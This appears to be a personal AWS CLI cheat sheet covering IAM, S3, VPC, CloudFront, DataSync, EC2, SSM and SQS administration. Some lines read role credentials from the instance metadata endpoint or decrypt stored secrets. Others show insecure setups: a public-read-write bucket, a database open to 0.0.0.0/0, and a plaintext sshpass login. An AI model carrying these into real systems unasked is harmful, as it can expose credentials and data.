aws configure get $AWS_PROFILE.aws_access_key_id
aws configure get $AWS_PROFILE.aws_secret_access_key

url to cli documentation, faq, collection of questions, UI

export aws_service_abbr="sns"

resource query, jsonpath query, aws json output path, aws json xpath

aws ec2 describe-instances \
--query 'Reservations[*].Instances[*].PublicIpAddress' \
--filters "Name=tag:Project,Values=udacity"
aws configservice select-resource-config --expression "SELECT resourceId WHERE resourceType='AWS::EC2::Instance'"

budget limit, cost management, budget cost explorer

price/cost formation: write - free, read - payable

aws_service_abbr="cost-management"
x-www-browser https://${AWS_REGION}.console.aws.amazon.com/cost-management/home?region=${AWS_REGION}#/dashboard
x-www-browser https://${AWS_REGION}.console.aws.amazon.com/billing/home?region=${AWS_REGION}#/budgets

IAM - Identity Access Manager

Type of the access:

aws_service_abbr="iam"
aws-cli-doc
aws-faq
aws-console
aws iam list-users 

# example of adding user to group 
aws iam add-user-to-group --group-name s3-full-access --user-name user-s3-bucket

# get role 
aws iam list-roles
aws iam get-role --role-name $ROLE_NAME

# policy find by name
POLICY_NAME=AmazonEKSWorkerNodePolicy
aws iam list-policies --query "Policies[?PolicyName=='$POLICY_NAME']"
aws iam list-policies --output text --query 'Policies[?PolicyName == `$POLICY_NAME`].Arn'
# policy get by ARN
aws iam get-policy-version --policy-arn $POLICY_ARN --version-id v1
# policy list 
aws iam list-attached-role-policies --role-name $ROLE_NAME
# policy attach 
aws iam attach-role-policy --policy-arn $POLICY_ARN --role-name $ROLE_NAME

example of role with policy creation with awscli

Policy

Policy types

  • Resource based
  • IAM based

Policy parts:

  • Principal ( User, Group )
  • Action (example for s3 keys and action)
  • Resource
  • Condition
    tag of the resource can be involved in condition

create policy from error output of aws-cli command:

User is not authorized to perform AccessDeniedException

aws iam list-groups 2>&1 | /home/projects/bash-example/awk-policy-json.sh
# or just copy it
echo "when calling the ListFunctions operation: Use..." | /home/projects/bash-example/awk-policy-json.sh

test sandbox for the policy


VPC

aws_service_abbr="vpc"
aws-cli-doc
aws-faq
aws-console

example of creating subnetwork:

VPC: 172.31.0.0/16
Subnetworks: 172.31.0.0/26, 172.31.0.64/26
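a hedged CLI sketch for the example above ( the vpc id is a placeholder ):

aws ec2 create-vpc --cidr-block 172.31.0.0/16
aws ec2 create-subnet --vpc-id vpc-0123456789abcdef0 --cidr-block 172.31.0.0/26
aws ec2 create-subnet --vpc-id vpc-0123456789abcdef0 --cidr-block 172.31.0.64/26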

VPC Flow logs

like Wireshark for VPC

VPC endpoint

it is an internal tunnel between the VPC and the rest of the AWS resources
when you are creating a target endpoint ( to access S3, for instance ) and want to use it from ec2, then also add

  • SSMMessagesEndpoint
  • EC2MessagesEndpoint

NAT

NAT Gateway (NGW) allows instances with no public IPs to access the internet.
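a hedged CLI sketch ( subnet, allocation and route table ids are placeholders ):

# the NAT gateway lives in a public subnet and needs an Elastic IP allocation
aws ec2 create-nat-gateway --subnet-id subnet-0123456789abcdef0 --allocation-id eipalloc-0123456789abcdef0
# route private-subnet traffic through it
aws ec2 create-route --route-table-id rtb-0123456789abcdef0 --destination-cidr-block 0.0.0.0/0 --nat-gateway-id nat-0123456789abcdef0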


IGW

Internet Gateway (IGW) allows instances with public IPs to access the internet.
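a hedged CLI sketch ( vpc and route table ids are placeholders ):

aws ec2 create-internet-gateway
aws ec2 attach-internet-gateway --internet-gateway-id igw-0123456789abcdef0 --vpc-id vpc-0123456789abcdef0
aws ec2 create-route --route-table-id rtb-0123456789abcdef0 --destination-cidr-block 0.0.0.0/0 --gateway-id igw-0123456789abcdef0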

public access internet outside access

  1. create internet gateway
  2. vpc -> route tables -> add route
  3. Security Group: inbound rules -> source 0.0.0.0/0

Transit Gateway

  1. Create Transit Gateway
  2. Create Transit Gateway attachment
  3. Create Transit Gateway route table
  4. Create Transit Gateway route table association
  5. Create Transit Gateway route table propagation
  6. Update VPC's route tables
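a hedged CLI sketch of the steps above ( all ids and CIDR are placeholders ):

aws ec2 create-transit-gateway --description "my-tgw"
aws ec2 create-transit-gateway-vpc-attachment --transit-gateway-id tgw-0123456789abcdef0 --vpc-id vpc-0123456789abcdef0 --subnet-ids subnet-0123456789abcdef0
aws ec2 create-transit-gateway-route-table --transit-gateway-id tgw-0123456789abcdef0
aws ec2 associate-transit-gateway-route-table --transit-gateway-route-table-id tgw-rtb-0123456789abcdef0 --transit-gateway-attachment-id tgw-attach-0123456789abcdef0
aws ec2 enable-transit-gateway-route-table-propagation --transit-gateway-route-table-id tgw-rtb-0123456789abcdef0 --transit-gateway-attachment-id tgw-attach-0123456789abcdef0
# finally add a route towards the transit gateway in each VPC route table
aws ec2 create-route --route-table-id rtb-0123456789abcdef0 --destination-cidr-block 10.1.0.0/16 --transit-gateway-id tgw-0123456789abcdef0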

Storage Gateway

is a service that connects an on-premises software appliance with cloud-based storage to provide seamless and secure integration between your on-premises IT environment and the AWS storage infrastructure in the AWS Cloud


S3 - object storage

there is an S3 File Gateway

aws_service_abbr='s3'
aws-cli-doc
aws-faq
aws-console

s3 static web site

s3 static web site DNS

for instance your DNS name is: my.service

  1. create bucket with name: my.service.s3-website.{your region}.amazonaws.com
  2. create bucket with name: www.my.service.s3-website.{your region}.amazonaws.com
  3. create DNS record: type: CNAME, name: www, value www.my.service.s3-website.{your region}.amazonaws.com
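static website hosting also has to be enabled on the buckets; a minimal sketch with the aws cli ( bucket name is a placeholder ):

aws s3 website s3://<bucket-name>/ --index-document index.html --error-document error.html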

s3 static web site SSL (HTTPS) certificate

for instance your DNS name is: my.service create cloudfront distribution: https://us-east-1.console.aws.amazon.com/cloudfront

  1. origin domain: your www.my.service.s3-website.{your region}.amazonaws.com

    important to have www prefix

  2. protocol: HTTP only
  3. Viewer protocol policy: HTTPS only
  4. Custom SSL certificate - optional
    1. request a public certificate

      https://us-east-1.console.aws.amazon.com/acm - AWS Certificate Manager -> Certificates

    2. domain name *.my.service

      add '*.' as a prefix

    3. create new
    4. copy CNAME name, CNAME value
    5. open your external ( non AWS ) DNS console and create/update record with type: CNAME
    6. validation will come later
  5. select newly created acm resource name ( SSL certificate )
  6. Alternative domain name (CNAME) - optional www.my.service
  7. Supported HTTP versions: HTTP/2 HTTP/3
  8. waiting for the "SSL validation"
  9. change DNS
    1. type: CNAME, name: www, value: {Distribution domain name like: d365erk6waf21.cloudfront.net}
    2. waiting for propagation
  10. visit your https://www.my.service

possible issues:

  • SSL_ERROR_NO_CYPHER_OVERLAP

    make sure the CloudFront "Alternative domain name (CNAME)" matches the domain name of the "Custom SSL certificate"

s3 operations

# make bucket - create bucket with globally unique name
AWS_BUCKET_NAME="my-bucket-name" 
aws s3 mb s3://$AWS_BUCKET_NAME
aws s3 mb s3://$AWS_BUCKET_NAME --region us-east-1 

# https://docs.aws.amazon.com/cli/latest/reference/s3api/create-bucket.html
# public access - Block all public access - Off
aws s3api create-bucket --bucket $AWS_BUCKET_NAME --acl public-read-write

# enable mfa delete
aws s3api put-bucket-versioning --bucket $AWS_BUCKET_NAME --versioning-configuration Status=Enabled,MFADelete=Enabled --mfa "arn-of-mfa-device mfa-code" --profile root-mfa-delete-demo
# disable mfa delete
aws s3api put-bucket-versioning --bucket $AWS_BUCKET_NAME --versioning-configuration Status=Enabled,MFADelete=Disabled --mfa "arn-of-mfa-device mfa-code" --profile root-mfa-delete-demo

# list of all s3
aws s3 ls
aws s3api list-buckets
aws s3api list-buckets --query "Buckets[].Name"
aws s3api list-buckets --query 'Buckets[?contains(Name, `my_bucket_name`) == `true`] | [0].Name' --output text 

# Bucket Policy, public read ( Block all public access - Off )
aws s3api get-bucket-location --bucket $AWS_BUCKET_NAME

# put object
aws s3api put-object --bucket $AWS_BUCKET_NAME --key file-name.with_extension --body /path/to/file-name.with_extension
# copy to s3, upload file less than 5 Tb
aws s3 cp /path/to/file-name.with_extension s3://$AWS_BUCKET_NAME
aws s3 cp /path/to/file-name.with_extension s3://$AWS_BUCKET_NAME/path/on/s3/filename.ext
# update metadata
aws s3 cp test.txt s3://a-bucket/test.txt --metadata '{"x-amz-meta-cms-id":"34533452"}'
# read metadata
aws s3api head-object --bucket a-bucket --key img/dir/legal-global/zach-walsh.jpeg

# copy from s3 to s3
aws s3 cp s3://$AWS_BUCKET_NAME/index.html s3://$AWS_BUCKET_NAME/index2.html

# download file
aws s3api get-object --bucket $AWS_BUCKET_NAME --key path/on/s3 /local/path

# create folder, s3 mkdir
aws s3api put-object --bucket my-bucket-name --key foldername/
# sync folder local to remote s3
aws s3 sync /path/to/some/folder s3://my-bucket-name/some/folder
# sync folder remote s3 to local
aws s3 sync s3://my-bucket-name/some/folder /path/to/some/folder 
# sync folder with remote s3 bucket with public access
aws s3 sync /path/to/some/folder s3://my-bucket-name/some/folder --acl public-read
# sync folder with remote s3 bucket and remove all not existing files locally but existing in bucket
aws s3 sync s3://my-bucket-name/some/folder /path/to/some/folder --delete
# list of all objects
aws s3 ls --recursive s3://my-bucket-name 
# list of all object by specified path ( / at the end must be )
aws s3 ls --recursive s3://my-bucket-name/my-sub-path/
# read object metadata
aws s3api head-object --bucket my-bucket-name --key file-name.with_extension
# move file 
aws s3 mv s3://$AWS_BUCKET_NAME/index.html s3://$AWS_BUCKET_NAME/index2.html
# remove file remove object
aws s3 rm  s3://$AWS_BUCKET_NAME/file-name.with_extension 
aws s3api delete-object --bucket $AWS_BUCKET_NAME --key file-name.with_extension 
# remove all objects
aws s3 rm s3://$AWS_S3_BUCKET_NAME --recursive --exclude "account.json" --include "*"
#!!! using only '--include "test-file*"' will remove ALL files, not only those matching the include pattern; use --exclude "*" --include "test-file*" instead

# upload file and make it public
aws s3api put-object-acl --bucket <bucket name> --key <path to file> --acl public-read
# read file 
aws s3api get-object --bucket <bucket-name> --key=<path on s3> <local output file>

# read version of object on S3
aws s3api list-object-versions --bucket $AWS_BUCKET_NAME --prefix $FILE_KEY
# read file by version 
aws s3api get-object --bucket $AWS_S3_BUCKET_NAME --version-id $VERSION_ID --key d3a274bb1aba08ce403a6a451c0298b9 /home/projects/temp/$VERSION_ID

# history object history list
aws s3api list-object-versions --bucket $AWS_S3_BUCKET_NAME --prefix $AWS_FILE_KEY | jq '.Versions[]' | jq '[.LastModified,.Key,.VersionId] | join(" ")' | grep -v "_response" | sort | sed "s/\"//g"
# remove s3
aws s3 ls
aws s3 rm s3://$AWS_BUCKET_NAME --recursive --include "*"
aws s3api delete-bucket --bucket $AWS_BUCKET_NAME
  • Bucket Policy, public read ( Block all public access - Off )
{
    "Version": "2012-10-17",
    "Id": "policy-bucket-001",
    "Statement": [
        {
            "Sid": "statement-bucket-001",
            "Effect": "Allow",
            "Principal": "*", 
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::YOUR_BUCKET_NAME/*"
        }
    ]
}
  • Access Control List - individual objects level
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObjectAcl",
                "s3:PutObjectAcl"
            ],
            "Resource": "arn:aws:s3:::*/*"
        }
    ]
}
  • Full access for role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowS3ReadAccess",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::INSERT-ACCOUNT-NUMBER:role/INSERT_ROLE_NAME"
      },
      "Action": "s3:*",
      "Resource": [
        "arn:aws:s3:::INSERT-BUCKET-NAME",
        "arn:aws:s3:::INSERT-BUCKET-NAME/*"
      ]
    }
  ]
}

datasync

move large amounts of data between on-premises storage and AWS storage services
DataSync configuration can be set up via AWS Management Console

aws_service_abbr="datasync"
aws-cli-doc
aws-faq
aws-console
aws-feature

datasync links

steps

  1. download datasync agent image DataSync -> Agents -> Create agent -> Deploy Agent
    1. download image
    2. start image in player
      1. install Oracle VM Virtual Box
      sudo apt install virtualbox
      1. File > Import Appliance…
      2. for entering into VM (ssh):
        DATASYNC_AGENT_IP=192.168.178.48
        DATASYNC_SSH_USER=admin
        DATASYNC_SSH_PASS=password
        sshpass -p ${DATASYNC_SSH_PASS} ssh ${DATASYNC_SSH_USER}@${DATASYNC_AGENT_IP}
  2. activate datasync agent
    1. via ssh
    2. via curl ( select CLI )
    DATASYNC_AGENT_IP=192.168.178.48
    ACTIVATION_REGION=eu-central-1
    curl "http://${DATASYNC_AGENT_IP}/?gatewayType=SYNC&activationRegion=${ACTIVATION_REGION}&no_redirect"
    
    # key 5C6V2-zzzz-yyyy-xxxx-xxxx
  3. register/create DataSync via aws console DataSync -> Agents -> create agent enter your key
  4. DataSync -> Tasks -> Create task
  5. configure DataSync options.
  6. Start, monitor, and review the DataSync task.

Agent

  • An agent is a virtual machine (VM) used to read data from or write data to a location.
  • An agent is used on premises(in cloud) to manage both read and write operations.
  • Agent status: online/offline
  A location is a:
    • endpoint of a task
    • source
    • destination
    • service used in the data transfer task.
  • DataSync agent overview
    1. TCP: 80 (HTTP) Used by your computer to obtain the agent activation key. After successful activation, DataSync closes the agent's port 80.
    2. TCP: 443 (HTTPS)
      • Used by the DataSync agent to activate with your AWS account. This is for agent activation only. You can block the endpoints after activation.
      • For communication between the DataSync agent and the AWS service endpoint. API endpoints: datasync.$region.amazonaws.com
        Data transfer endpoints: $taskId.datasync-dp.$region.amazonaws.com cp.datasync.$region.amazonaws.com
        Data transfer endpoints for FIPS: cp.datasync-fips.$region.amazonaws.com
        Agent updates: repo.$region.amazonaws.com repo.default.amazonaws.com packages.$region.amazonaws.com
    3. TCP/UDP: 53 (DNS) For communication between DataSync agent and the DNS server.
    4. TCP: 22 Allows AWS Support to access your DataSync to help you with troubleshooting DataSync issues. You don't need this port open for normal operation, but it is required for troubleshooting.
    5. UDP: 123 (NTP) Used by local systems to synchronize VM time to the host time. NTP 0.amazon.pool.ntp.org 1.amazon.pool.ntp.org 2.amazon.pool.ntp.org 3.amazon.pool.ntp.org

Task

Task management/configuration can be set up via:

  • AWS Management Console
  • AWS Command Line Interface (AWS CLI)
  • DataSync API

Task configuration settings include:
  • source
  • destination
  • options
  • filtering (include/exclude)
  • scheduling
  • frequency
  • tags
  • logging

Task phases:
  • queuing
  • launching
  • preparing
  • transferring
  • verifying (VerifyMode)
  • success/failure

DataSync operations

your_account_id=802320....
task_id=task-292234306
execution_id=exec-00ab121a437a222

aws datasync list-task-executions --task-arn arn:aws:datasync:eu-central-1:$your_account_id:task/$task_id
aws datasync describe-task-execution --task-execution-arn arn:aws:datasync:eu-central-1:$your_account_id:task/$task_id/execution/$execution_id | jq '.Includes[].Value, .FilesTransferred, .BytesTransferred'
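
creating locations and a task from the CLI: a minimal sketch, assuming an NFS source behind the agent and an S3 destination; all ARNs, hostnames and role names below are placeholders

# source location: NFS share reachable from the agent
aws datasync create-location-nfs \
  --server-hostname 192.168.178.10 \
  --subdirectory /export/data \
  --on-prem-config AgentArns=arn:aws:datasync:eu-central-1:$your_account_id:agent/agent-0123456789abcdef0

# destination location: S3 bucket with a role that DataSync is allowed to assume
aws datasync create-location-s3 \
  --s3-bucket-arn arn:aws:s3:::my-bucket-001 \
  --s3-config BucketAccessRoleArn=arn:aws:iam::$your_account_id:role/datasync-s3-access

# task between the two locations, then run it
aws datasync create-task --source-location-arn $SRC_LOCATION_ARN --destination-location-arn $DST_LOCATION_ARN --name my-datasync-task
aws datasync start-task-execution --task-arn arn:aws:datasync:eu-central-1:$your_account_id:task/$task_id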

RDS

consider the data-storage access pattern ( see CommandQueryResponsibilitySegregation ):

  • read heavy
  • write heavy

jdbc wrapper
there is also the "Database Migration Service"

PostgreSQL

!!! important: during creation set the following parameter:
Additional configuration -> Database options -> Initial database
( default schema - postgres )
!!! if you have created a publicly accessible DB, check/create an inbound rule in the security group: IPv4 PostgreSQL TCP 5432 0.0.0.0/0
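
connect to the instance after creation: a minimal sketch, assuming the psql client is installed locally; the instance identifier and endpoint are placeholders

# resolve the endpoint of the instance
aws rds describe-db-instances --db-instance-identifier my-postgres-instance --query "DBInstances[0].Endpoint.Address" --output text
# connect ( default database/schema - postgres )
RDS_ENDPOINT=my-postgres-instance.abcdefgh1234.eu-central-1.rds.amazonaws.com
psql "host=$RDS_ENDPOINT port=5432 dbname=postgres user=postgres sslmode=require"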


aws_service_abbr="athena"
aws-cli-doc
aws-faq
aws-console
### simple data  
s3://my-bucket-001/temp/
```csv
column-1,column-2,column3
1,one,first
2,two,second
3,three,third
4,four,fourth
5,five,fifth

create database

CREATE DATABASE IF NOT EXISTS cherkavi_database_001 COMMENT 'csv example' LOCATION 's3://my-bucket-001/temp/';

create table

CREATE EXTERNAL TABLE IF NOT EXISTS num_sequence (id int,column_name string,column_value string)
ROW FORMAT DELIMITED
      FIELDS TERMINATED BY ','
      ESCAPED BY '\\'
      LINES TERMINATED BY '\n'
    LOCATION 's3://my-bucket-001/temp/';

--- another way to create table 
CREATE EXTERNAL TABLE num_sequence2 (id int,column_name string,column_value string)
ROW FORMAT SERDE 'org.apache.hadoop.hive.serde2.OpenCSVSerde' 
WITH SERDEPROPERTIES ("separatorChar" = ",", "escapeChar" = "\\") 
LOCATION 's3://my-bucket-001/temp/'    

execute query

select * from num_sequence;
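
the same query can also be started from the CLI; a sketch, assuming the result bucket/prefix is a placeholder

QUERY_EXECUTION_ID=$(aws athena start-query-execution \
  --query-string "select * from num_sequence" \
  --query-execution-context Database=cherkavi_database_001 \
  --result-configuration OutputLocation=s3://my-bucket-001/athena-results/ \
  --query QueryExecutionId --output text)
aws athena get-query-execution --query-execution-id $QUERY_EXECUTION_ID --query "QueryExecution.Status.State"
aws athena get-query-results --query-execution-id $QUERY_EXECUTION_ID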

CloudFront

cloud-front

aws_service_abbr="cloudfront"
aws-cli-doc
aws-faq
aws-console
flowchart RL;
    AvailabilityZone --o Region
        EdgeLocation --o Region

nice to have 2-3 availability zones

REGION=us-east-1
BUCKET_NAME=bucket-for-static-web
BUCKET_HOST=$BUCKET_NAME.s3-website-$REGION.amazonaws.com
DISTRIBUTION_ID=$BUCKET_HOST'-cli-3'
DOMAIN_NAME=$BUCKET_HOST
echo '{
    "CallerReference": "cli-example",
    "Aliases": {
        "Quantity": 0
    },
    "DefaultRootObject": "index.html",
    "Origins": {
        "Quantity": 1,
        "Items": [
            {
                "Id": "'$DISTRIBUTION_ID'",
                "DomainName": "'$DOMAIN_NAME'",
                "OriginPath": "",
                "CustomHeaders": {
                    "Quantity": 0
                },
                "CustomOriginConfig": {
                    "HTTPPort": 80,
                    "HTTPSPort": 443,
                    "OriginProtocolPolicy": "http-only",
                    "OriginSslProtocols": {
                        "Quantity": 1,
                        "Items": [
                            "TLSv1.2"
                        ]
                    },
                    "OriginReadTimeout": 30,
                    "OriginKeepaliveTimeout": 5
                },
                "ConnectionAttempts": 3,
                "ConnectionTimeout": 10,
                "OriginShield": {
                    "Enabled": false
                },
                "OriginAccessControlId": ""
            }
        ]
    },
    "OriginGroups": {
        "Quantity": 0
    },
    "DefaultCacheBehavior": {
        "TargetOriginId": "'$DISTRIBUTION_ID'",
        "ForwardedValues": {
            "QueryString": false,
            "Cookies": {
                "Forward": "none"
            },
            "Headers": {
                "Quantity": 0
            },
            "QueryStringCacheKeys": {
                "Quantity": 0
            }
        },        
        "TrustedSigners": {
            "Enabled": false,
            "Quantity": 0
        },
        "TrustedKeyGroups": {
            "Enabled": false,
            "Quantity": 0
        },
        "ViewerProtocolPolicy": "redirect-to-https",
        "MinTTL": 0,
        "AllowedMethods": {
            "Quantity": 2,
            "Items": [
                "HEAD",
                "GET"
            ],
            "CachedMethods": {
                "Quantity": 2,
                "Items": [
                    "HEAD",
                    "GET"
                ]
            }
        },
        "SmoothStreaming": false,
        "Compress": true,
        "LambdaFunctionAssociations": {
            "Quantity": 0
        },
        "FunctionAssociations": {
            "Quantity": 0
        },
        "FieldLevelEncryptionId": ""
    },
    "CacheBehaviors": {
        "Quantity": 0
    },
    "CustomErrorResponses": {
        "Quantity": 0
    },
    "Comment": "",
    "PriceClass": "PriceClass_All",
    "Enabled": true,
    "ViewerCertificate": {
        "CloudFrontDefaultCertificate": true,
        "SSLSupportMethod": "vip",
        "MinimumProtocolVersion": "TLSv1",
        "CertificateSource": "cloudfront"
    },
    "Restrictions": {
        "GeoRestriction": {
            "RestrictionType": "none",
            "Quantity": 0
        }
    },
    "WebACLId": "",
    "HttpVersion": "http2",
    "IsIPV6Enabled": true,
    "Staging": false
}' > distribution-config.json
# vim distribution-config.json
aws cloudfront create-distribution --distribution-config file://distribution-config.json
# "ETag": "E2ADZ1SMWE",   

aws cloudfront list-distributions | grep DomainName

# aws cloudfront list-distributions | grep '"Id":'
# aws cloudfront delete-distribution --id E6Q0X5NZY --if-match E2ADZ1SMWE
### cloudfront delete
DISTRIBUTION_ID=`aws cloudfront list-distributions | jq -r ".DistributionList.Items[].Id"`
echo $DISTRIBUTION_ID | clipboard
aws cloudfront get-distribution --id $DISTRIBUTION_ID > $DISTRIBUTION_ID.cloud_front
DISTRIBUTION_ETAG=`jq -r .ETag $DISTRIBUTION_ID.cloud_front`
## disable distribution
# fx $DISTRIBUTION_ID.cloud_front
jq '.Distribution.DistributionConfig.Enabled = false' $DISTRIBUTION_ID.cloud_front |  jq '.Distribution.DistributionConfig' > $DISTRIBUTION_ID.cloud_front_updated 
aws cloudfront update-distribution --id $DISTRIBUTION_ID --if-match $DISTRIBUTION_ETAG --distribution-config file://$DISTRIBUTION_ID.cloud_front_updated 
## remove distribution
aws cloudfront get-distribution --id $DISTRIBUTION_ID > $DISTRIBUTION_ID.cloud_front
DISTRIBUTION_ETAG=`jq -r .ETag $DISTRIBUTION_ID.cloud_front`
aws cloudfront delete-distribution --id $DISTRIBUTION_ID --if-match $DISTRIBUTION_ETAG

Secrets manager

aws_service_abbr="secretsmanager"
aws-cli-doc
aws-faq
aws-console

boto3 python lib
see:

### CLI example
# read secret
aws secretsmanager get-secret-value --secret-id LinkedIn_project_Web_LLC --region $AWS_REGION --profile cherkavi-user

readonly policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "secretsmanager:GetSecretValue",
            "Resource": "arn:aws:secretsmanager:*:*:secret:*"
        }
    ]
}
# create secret
aws secretsmanager put-secret-value --secret-id MyTestDatabaseSecret --secret-string file://mycreds.json

# create secret for DB
aws secretsmanager create-secret \
    --name $DB_SECRET_NAME \
    --secret-string "{\"engine\":\"mysql\",\"username\":\"$DB_LOGIN\",\"password\":\"$DB_PASSWORD\",\"dbname\":\"$DB_NAME\",\"port\": \"3306\",\"host\": \"$DB_ADDRESS\"}"

EC2

aws_service_abbr="ec2"
aws-cli-doc
aws-faq
aws-console

purchases options

# list ec2, ec2 list, instances list
aws ec2 describe-instances --profile $AWS_PROFILE --region $AWS_REGION --filters Name=tag-key,Values=test
# example
aws ec2 describe-instances --region us-east-1 --filters "Name=tag:Name,Values=ApplicationInstance"
# !!! without --filters you may not get the full list of EC2 instances !!!
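
launch and terminate an instance from the CLI ( a sketch; the AMI, key pair, security group, subnet and instance IDs are placeholders )

aws ec2 run-instances \
  --image-id ami-0123456789abcdef0 \
  --instance-type t3.micro \
  --key-name $AWS_KEY_PAIR_NAME \
  --security-group-ids sg-0123456789abcdef0 \
  --subnet-id subnet-0123456789abcdef0 \
  --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=ApplicationInstance}]' \
  --region $AWS_REGION
# terminate it again
aws ec2 terminate-instances --instance-ids i-0123456789abcdef0 --region $AWS_REGION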

connect to launched instance

INSTANCE_PUBLIC_DNS="ec2-52-29-176.eu-central-1.compute.amazonaws.com"
ssh -i $AWS_KEY_PAIR ubuntu@$INSTANCE_PUBLIC_DNS

connect to instance in private subnet, bastion approach

flowchart LR;
    a[actor] -->|inventory| jb
    subgraph public subnet    
        jb[ec2 
           jumpbox]
    end
    subgraph private subnet    
        s[ec2 
          server]
    end
    jb -->|inventory| s


reading information about current instance, local ip address, my ip address, connection to current instance, instance reflection, instance metadata, instance description

curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/instance-id
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/api/token
# public ip 
curl http://169.254.169.254/latest/meta-data/public-ipv4

curl http://169.254.169.254/latest/dynamic/instance-identity/document

create token from ec2 instance

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
export AWS_REGION=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" -s http://169.254.169.254/latest/dynamic/instance-identity/document | jq -r '.region')

connect to launched instance without ssh

using SSM-agent installed in

# ssm role should be provided for account
aws ssm start-session --target i-00ac7eee --profile awsstudent --region us-east-1

DNS issue space exceed

sudo systemctl restart systemd-resolved
sudo vim /etc/resolv.conf
# nameserver 127.0.0.53
nameserver 10.0.0.2
options edns0 trust-ad
search ec2.internal

SSM

aws_service_abbr="ssm"
aws-cli-doc
aws-faq
# GET PARAMETERS
aws ssm get-parameters --names /my-app/dev/db-url /my-app/dev/db-password
aws ssm get-parameters --names /my-app/dev/db-url /my-app/dev/db-password --with-decryption

# GET PARAMETERS BY PATH
aws ssm get-parameters-by-path --path /my-app/dev/
aws ssm get-parameters-by-path --path /my-app/ --recursive
aws ssm get-parameters-by-path --path /my-app/ --recursive --with-decryption
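
creating and removing parameters ( sketch; parameter names and values are examples )

aws ssm put-parameter --name /my-app/dev/db-url --value "jdbc:postgresql://my-host:5432/mydb" --type String
aws ssm put-parameter --name /my-app/dev/db-password --value "super-secret" --type SecureString --overwrite
aws ssm get-parameter --name /my-app/dev/db-password --with-decryption
aws ssm delete-parameter --name /my-app/dev/db-url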

EBS - block storage

aws_service_abbr="ebs"
aws-cli-doc
aws-faq

a snapshot can be created from an EBS volume; a snapshot can be copied to another region; a volume can be created from a snapshot and attached to an EC2 instance:
EBS --> Snapshot --> copy to region --> Snapshot --> EBS --> attach to EC2
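
the same flow from the CLI ( a sketch; all volume, snapshot and instance IDs are placeholders )

aws ec2 create-snapshot --volume-id vol-0123456789abcdef0 --description "backup before region copy"
aws ec2 copy-snapshot --source-region eu-central-1 --source-snapshot-id snap-0123456789abcdef0 --region us-east-1
aws ec2 create-volume --availability-zone us-east-1a --snapshot-id snap-0fedcba9876543210
aws ec2 attach-volume --volume-id vol-0fedcba9876543210 --instance-id i-0123456789abcdef0 --device /dev/sdf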

attach new volume

# list volumes
sudo lsblk
sudo fdisk -l
# describe volume from previous command - /dev/xvdf
sudo file -s /dev/xvdf
# !!! new partitions !!! format volume
# sudo mkfs -t xfs /dev/xvdf
# or # sudo mke2fs /dev/xvdf
# attach volume
sudo mkdir /external-drive
sudo mount /dev/xvdf /external-drive

ELB - Elastic Load Balancer

elb

aws_service_abbr="elb"
aws-cli-doc
aws-faq
flowchart LR;
    r[Request] --> lb
    l[Listener] --o lb[Load Balancer]

    lr[Listener
       Rule] --o l
    lr --> target_group1
    lr --> target_group2
    lr --> target_group3

    subgraph target_group1
        c11[ec2]
        c12[ec2]
        c13[ec2]
    end
    subgraph target_group2
        c21[ec2]
        c22[ec2]
        c23[ec2]
    end
    subgraph target_group3
        c31[ec2]
        c32[ec2]
        c33[ec2]
    end
    

autoscaling group

ELB troubleshooting

# documentation 
aws_service_abbr="elb"; cli-doc

EFS - Elastic File System storage

aws_service_abbr="efs"
aws-cli-doc
aws-faq
# how to write files into /efs and they'll be available on both your ec2 instances!

# on both instances:
sudo yum install -y amazon-efs-utils
sudo mkdir /efs
sudo mount -t efs fs-yourid:/ /efs
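
creating the file system and a mount target from the CLI ( sketch; the subnet and security-group IDs are placeholders )

aws efs create-file-system --creation-token my-efs-001 --tags Key=Name,Value=my-efs-001
aws efs describe-file-systems --query "FileSystems[].FileSystemId"
aws efs create-mount-target --file-system-id fs-0123456789abcdef0 --subnet-id subnet-0123456789abcdef0 --security-groups sg-0123456789abcdef0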

SQS - Queue Service

types: standard, fifo

aws_service_abbr="sqs"
aws-cli-doc
aws-faq
# get CLI help
aws sqs help

# list queues and specify the region
aws sqs list-queues --region $AWS_REGION

AWS_QUEUE_URL=https://queue.amazonaws.com/3877777777/MyQueue
aws sqs send-message --queue-url ${AWS_QUEUE_URL} --message-body '{"test":00001}'
# status of the message - available
RECEIVE_MESSAGE_OUTPUT=$(aws sqs receive-message --queue-url ${AWS_QUEUE_URL})
# status of the message - message in flight
RECEIPT_HANDLE=$(echo $RECEIVE_MESSAGE_OUTPUT | jq -r '.Messages[0].ReceiptHandle')
aws sqs delete-message --queue-url ${AWS_QUEUE_URL} --receipt-handle $RECEIPT_HANDLE
# status of the message - not available 
# send a message
aws sqs send-message help
aws sqs send-message --queue-url $AWS_QUEUE_URL --region $AWS_REGION --message-body "my test message"

# receive a message
aws sqs receive-message help
aws sqs receive-message --region $AWS_REGION  --queue-url $AWS_QUEUE_URL --max-number-of-messages 10 --visibility-timeout 30 --wait-time-seconds 20

# delete a message ( confirmation of receiving !!! )
aws sqs delete-message help
aws sqs receive-message --region us-east-1  --queue-url $AWS_QUEUE_URL --max-number-of-messages 10 --visibility-timeout 30 --wait-time-seconds 20

aws sqs delete-message --receipt-handle $RECEIPT_HANDLE --queue-url $AWS_QUEUE_URL --region $AWS_REGION
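
creating and removing queues ( sketch; queue names are examples )

aws sqs create-queue --queue-name my-queue --region $AWS_REGION
# fifo queue: name must end with .fifo
aws sqs create-queue --queue-name my-queue.fifo --attributes FifoQueue=true,ContentBasedDeduplication=true --region $AWS_REGION
# resolve the url by name
aws sqs get-queue-url --queue-name my-queue --region $AWS_REGION
# delete queue
aws sqs delete-queue --queue-url $AWS_QUEUE_URL --region $AWS_REGION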

EventBridge

Event hub that receives, collects, filters, and routes events ( messages with body and header ) based on rules
back to the sender, to other services, to APIs ... ( a CLI sketch follows the terms list below )
Similar to SQS but broader in scope.
Offers comprehensive monitoring and auditing capabilities.

terms

